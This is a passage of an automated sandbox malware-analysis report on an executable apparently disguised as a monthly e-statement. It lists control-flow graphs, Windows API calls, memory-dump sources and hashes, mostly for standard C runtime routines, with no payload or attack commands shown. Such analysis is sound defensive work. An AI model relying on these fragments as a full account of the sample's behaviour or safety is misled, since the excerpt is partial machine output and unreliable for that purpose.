                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: fc87644b51a8e15e58e1ec25bbfe452e1a05256094174e19f5e83f6d37d16546
                                                                                                                                                                                                                                                                    • Instruction ID: 6c1aaf7bc5f544022396c75b73b973f0d3a73345907355d188d6f5eb40bab2f1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc87644b51a8e15e58e1ec25bbfe452e1a05256094174e19f5e83f6d37d16546
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11B976610158FFCB45EF96EC42CD93B65EF44750F0140A2F9088F162DA75EE50AB80

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 165 f27ab4-f27acd 166 f27ae3-f27ae8 165->166 167 f27acf-f27adf call f282cc 165->167 169 f27af5-f27b19 MultiByteToWideChar 166->169 170 f27aea-f27af2 166->170 167->166 177 f27ae1 167->177 171 f27b1f-f27b2b 169->171 172 f27cac-f27cbf call f2123a 169->172 170->169 174 f27b7f 171->174 175 f27b2d-f27b3e 171->175 181 f27b81-f27b83 174->181 178 f27b40-f27b4f call f2ac20 175->178 179 f27b5d-f27b63 175->179 177->166 184 f27ca1 178->184 191 f27b55-f27b5b 178->191 183 f27b64 call f262ff 179->183 181->184 185 f27b89-f27b9c MultiByteToWideChar 181->185 187 f27b69-f27b6e 183->187 189 f27ca3-f27caa call f2646a 184->189 185->184 188 f27ba2-f27bbd call f25a15 185->188 187->184 192 f27b74 187->192 188->184 197 f27bc3-f27bca 188->197 189->172 196 f27b7a-f27b7d 191->196 192->196 196->181 198 f27c04-f27c10 197->198 199 f27bcc-f27bd1 197->199 201 f27c12-f27c23 198->201 202 f27c5c 198->202 199->189 200 f27bd7-f27bd9 199->200 200->184 203 f27bdf-f27bf9 call f25a15 200->203 205 f27c25-f27c34 call f2ac20 201->205 206 f27c3e-f27c44 201->206 204 f27c5e-f27c60 202->204 203->189 218 f27bff 203->218 208 f27c62-f27c7b call f25a15 204->208 209 f27c9a-f27ca0 call f2646a 204->209 205->209 221 f27c36-f27c3c 205->221 211 f27c45 call f262ff 206->211 208->209 223 f27c7d-f27c84 208->223 209->184 212 f27c4a-f27c4f 211->212 212->209 217 f27c51 212->217 222 f27c57-f27c5a 217->222 218->184 221->222 222->204 224 f27cc0-f27cc6 223->224 225 f27c86-f27c87 223->225 226 f27c88-f27c98 WideCharToMultiByte 224->226 225->226 226->209 227 f27cc8-f27ccf call f2646a 226->227 227->189
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00F254C8,00000000,?,?,?,00F27D05,?,?,00000100), ref: 00F27B0E
                                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00F27B46
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00F27D05,?,?,00000100,5EFC4D8B,?,?), ref: 00F27B94
                                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00F27C2B
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F27C8E
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00F27C9B
                                                                                                                                                                                                                                                                      • Part of subcall function 00F262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F27E5B,?,00000000,?,00F2686F,?,00000004,00000000,?,?,?,00F23BCD), ref: 00F26331
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00F27CA4
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00F27CC9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2597970681-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8ea96bda528cb1f3e13b438d3ddf15105345de4164d3c9d72e4764621044c00c
                                                                                                                                                                                                                                                                    • Instruction ID: 2c0ed481370dfd29da89a180ba65adb10afe16a44483625eafac6c3c6e9fd481
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ea96bda528cb1f3e13b438d3ddf15105345de4164d3c9d72e4764621044c00c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E51D272A54326ABDB25AF74EC81EBF77AAEB44760B154629FC04DA140EB38DC40E650

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 230 f28417-f28474 GetConsoleCP 231 f285b7-f285c9 call f2123a 230->231 232 f2847a-f28496 230->232 233 f284b1-f284c2 call f26052 232->233 234 f28498-f284af 232->234 242 f284c4-f284c7 233->242 243 f284e8-f284ea 233->243 236 f284eb-f284fa call f272b7 234->236 236->231 244 f28500-f28520 WideCharToMultiByte 236->244 245 f2858e-f285ad 242->245 246 f284cd-f284df call f272b7 242->246 243->236 244->231 247 f28526-f2853c WriteFile 244->247 245->231 246->231 253 f284e5-f284e6 246->253 249 f2853e-f2854f 247->249 250 f285af-f285b5 GetLastError 247->250 249->231 252 f28551-f28555 249->252 250->231 254 f28583-f28586 252->254 255 f28557-f28575 WriteFile 252->255 253->244 254->232 257 f2858c 254->257 255->250 256 f28577-f2857b 255->256 256->231 258 f2857d-f28580 256->258 257->231 258->254
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00F28B8C,?,00000000,?,00000000,00000000), ref: 00F28459
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00F284D4
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00F284EF
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00F28515
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,00F28B8C,00000000,?,?,?,?,?,?,?,?,?,00F28B8C,?), ref: 00F28534
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00F28B8C,00000000,?,?,?,?,?,?,?,?,?,00F28B8C,?), ref: 00F2856D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                    • Opcode ID: 24bf72b642adb5f6a343a4d24007998a97c07038302d6a799520ae12fb3418cc
                                                                                                                                                                                                                                                                    • Instruction ID: fb5cf23054b0f75aa31262fc0c38e38fb8be5993161fbf33b3422389067a38cb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24bf72b642adb5f6a343a4d24007998a97c07038302d6a799520ae12fb3418cc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E51D471D002599FDB10CFA8EC95AEEBBF5FF18360F18411AE951E7291D7309942DB60

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
APIs
• _ValidateLocalCookies.LIBCMT ref: 00F21E37
• ___except_validate_context_record.LIBVCRUNTIME ref: 00F21E3F
• _ValidateLocalCookies.LIBCMT ref: 00F21EC8
• __IsNonwritableInCurrentImage.LIBCMT ref: 00F21EF3
• _ValidateLocalCookies.LIBCMT ref: 00F21F48
Strings
Memory Dump Source
• Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373

Control-flow Graph

• Executed
• Not Executed
APIs
  • Part of subcall function 00F261DF: _free.LIBCMT ref: 00F26208
• _free.LIBCMT ref: 00F26269
  • Part of subcall function 00F24869: HeapFree.KERNEL32(00000000,00000000,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?), ref: 00F2487F
  • Part of subcall function 00F24869: GetLastError.KERNEL32(?,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?,?), ref: 00F24891
• _free.LIBCMT ref: 00F26274
• _free.LIBCMT ref: 00F2627F
• _free.LIBCMT ref: 00F262D3
• _free.LIBCMT ref: 00F262DE
• _free.LIBCMT ref: 00F262E9
• _free.LIBCMT ref: 00F262F4
Memory Dump Source
• Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0

Control-flow Graph

• Executed
• Not Executed
APIs
• GetLastError.KERNEL32(?,?,00F223C8,00F2209F,00F21AFC), ref: 00F223DF
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F223ED
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F22406
• SetLastError.KERNEL32(00000000,00F223C8,00F2209F,00F21AFC), ref: 00F22458
Memory Dump Source
• Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 366 f24424-f24438 GetLastError 367 f24446-f2444b 366->367 368 f2443a-f24444 call f25904 366->368 370 f2444d call f2480c 367->370 368->367 373 f2448f-f2449a SetLastError 368->373 372 f24452-f24458 370->372 374 f24463-f24471 call f2595a 372->374 375 f2445a 372->375 380 f24473-f24474 374->380 381 f24476-f2448d call f24296 call f24869 374->381 376 f2445b-f24461 call f24869 375->376 384 f2449b-f244a7 SetLastError call f23f24 376->384 380->376 381->373 381->384
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000008,?,00F26D69,?,?,?,00F304C8,0000002C,00F23F34,00000016,00F2209F,00F21AFC), ref: 00F24428
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2445B
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24483
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00F24490
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00F2449C
                                                                                                                                                                                                                                                                    • _abort.LIBCMT ref: 00F244A2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3160817290-0

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F236AD,?,?,00F2364D,?,00F302E0,0000000C,00F237A4,?,00000002), ref: 00F2371C
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F2372F
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00F236AD,?,?,00F2364D,?,00F302E0,0000000C,00F237A4,?,00000002,00000000), ref: 00F23752
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00F254C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00F2639A
                                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00F263D2
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F26423
                                                                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F26435
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00F2643E
                                                                                                                                                                                                                                                                      • Part of subcall function 00F262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F27E5B,?,00000000,?,00F2686F,?,00000004,00000000,?,?,?,00F23BCD), ref: 00F26331
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1857427562-0

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00F25627
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F2564A
                                                                                                                                                                                                                                                                      • Part of subcall function 00F262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00F27E5B,?,00000000,?,00F2686F,?,00000004,00000000,?,?,?,00F23BCD), ref: 00F26331
                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F25670
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F25683
                                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F25692
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2278895681-0

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00F247FE,00F27E79,?,00F2686F,?,00000004,00000000,?,?,?,00F23BCD,?,00000000), ref: 00F244AD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F244E2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F24509
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F24516
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F2451F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                    • Opcode ID: 74c741c3b6cb3c33989bd481dafb2dbbb57f99718b1b28b01dbed7d81b716ff4
                                                                                                                                                                                                                                                                    • Instruction ID: f8a3c0d370758bb1aeb22b6ec3f1dc5e4adef01b4d32586d23cfaec95fff117e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74c741c3b6cb3c33989bd481dafb2dbbb57f99718b1b28b01dbed7d81b716ff4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C701F476600674AB8226F6357C46F2B332EBBC17717240125FD19D21D2EFF4AD017020

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    control_flow_graph 470 f26176-f26181 471 f26183-f2618b 470->471 472 f261dc-f261de 470->472 473 f26194-f2619d 471->473 474 f2618d-f26193 call f24869 471->474 476 f261a6-f261af 473->476 477 f2619f-f261a5 call f24869 473->477 474->473 478 f261b1-f261b7 call f24869 476->478 479 f261b8-f261c1 476->479 477->476 478->479 484 f261c3-f261c9 call f24869 479->484 485 f261ca-f261d3 479->485 484->485 485->472 488 f261d5-f261db call f24869 485->488 488->472
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2618E
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: HeapFree.KERNEL32(00000000,00000000,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?), ref: 00F2487F
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: GetLastError.KERNEL32(?,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?,?), ref: 00F24891
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F261A0
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F261B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F261C4
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F261D6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: cd32aedc6f1954be583e78084207bf20b72d62f73bc8e203853b161b864dd4f7
                                                                                                                                                                                                                                                                    • Instruction ID: 7fddbd8c77f45d634235b7b94afc44e2f142f7dc7c14e3262c725d801bf94497
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd32aedc6f1954be583e78084207bf20b72d62f73bc8e203853b161b864dd4f7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9F06232A14224AF8664EB95F982C5A77DEBB40F303680805F40AD7592C734FC80A650
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23DAD
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: HeapFree.KERNEL32(00000000,00000000,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?), ref: 00F2487F
                                                                                                                                                                                                                                                                      • Part of subcall function 00F24869: GetLastError.KERNEL32(?,?,00F2620D,?,00000000,?,00000000,?,00F26234,?,00000007,?,?,00F2669F,?,?), ref: 00F24891
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23DBF
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23DD2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23DE3
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23DF4
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6d91f15b9014c7eafb8079ce63e2f9ae485ee11285b092ce388cd90caeaf63b9
                                                                                                                                                                                                                                                                    • Instruction ID: e5f45cdca304bc486881d39d2002b30e4076ce3da2c05217b49a2a05cc8d9522
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d91f15b9014c7eafb8079ce63e2f9ae485ee11285b092ce388cd90caeaf63b9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2F0F8B88202789FDBD96F15FD014893B63FB857303450217F9129A2B1CB791951BBC1
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe,00000104), ref: 00F22F93
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F2305E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F23068
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2255482719.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000000.00000002.2255463141.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255502726.0000000000F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255523457.0000000000F31000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2255539210.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_f20000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                                                                                    • API String ID: 2506810119-4063345880
                                                                                                                                                                                                                                                                    • Opcode ID: 1622117660730db6eaacf0051925ef2c0554c83ff476ab7bf9a67229a2ac272e
                                                                                                                                                                                                                                                                    • Instruction ID: 1578217145e38a6a160300a861c53d4be6ef70998484edb012a24fc0f5e7ca4b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1622117660730db6eaacf0051925ef2c0554c83ff476ab7bf9a67229a2ac272e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 643164B5E00268AFCB21DF99EC8199EBBBCEF85724F104066F40497251D6799E40EB61
                                                                                                                                                                                                                                                                    APIs
